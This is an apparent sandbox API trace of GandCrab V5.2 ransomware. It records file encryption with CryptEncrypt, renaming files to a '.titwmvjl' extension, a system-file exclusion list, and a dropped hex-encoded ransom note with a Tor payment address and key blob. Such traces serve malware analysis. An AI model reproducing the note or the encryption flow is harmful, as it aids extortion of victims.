pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.213] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.214] GetLastError () returned 0x0 [0089.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.214] CryptDestroyKey (hKey=0x503638) returned 1 [0089.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.214] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.214] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x567e, lpOverlapped=0x0) returned 1 [0089.221] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffa982, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.221] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x567e, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x567e, lpOverlapped=0x0) returned 1 [0089.223] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.223] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.225] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.230] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.230] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.230] CloseHandle (hObject=0x2ac) returned 1 [0089.231] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sjkppg7gi7gg_.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SJKpPG7Gi7Gg_.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sjkppg7gi7gg_.swf.titwmvjl"), dwFlags=0x1) returned 1 [0089.232] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.232] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.232] lstrcmpW (lpString1="sstojx.exe", lpString2=".") returned 1 [0089.232] lstrcmpW (lpString1="sstojx.exe", lpString2="..") returned 1 [0089.232] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="sstojx.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe" [0089.232] lstrlenW (lpString=".titwmvjl") returned 9 [0089.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe") returned 40 [0089.232] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.232] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe.titwmvjl") returned 49 [0089.232] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe") returned 40 [0089.232] lstrlenW (lpString=".exe") returned 4 [0089.232] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.233] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".exe ") returned 5 [0089.233] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.233] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.233] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.233] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0089.233] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0089.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt" [0089.233] lstrlenW (lpString=".titwmvjl") returned 9 [0089.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt") returned 50 [0089.233] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.233] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 59 [0089.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt") returned 50 [0089.233] lstrlenW (lpString=".txt") returned 4 [0089.233] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.234] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0089.234] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0089.234] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt") returned 50 [0089.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\TITWMVJL-DECRYPT.txt") returned 50 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0089.234] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0089.234] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.234] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.234] lstrcmpW (lpString1="VRacl0_hrlFRcTffeaIO", lpString2=".") returned 1 [0089.234] lstrcmpW (lpString1="VRacl0_hrlFRcTffeaIO", lpString2="..") returned 1 [0089.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="VRacl0_hrlFRcTffeaIO" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO" [0089.234] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\" [0089.235] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.235] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.235] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.235] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.236] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.236] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.236] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.236] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.236] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.236] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\\\TITWMVJL-DECRYPT.txt") returned 72 [0089.236] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\VRacl0_hrlFRcTffeaIO\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vracl0_hrlfrctffeaio\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0089.238] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x4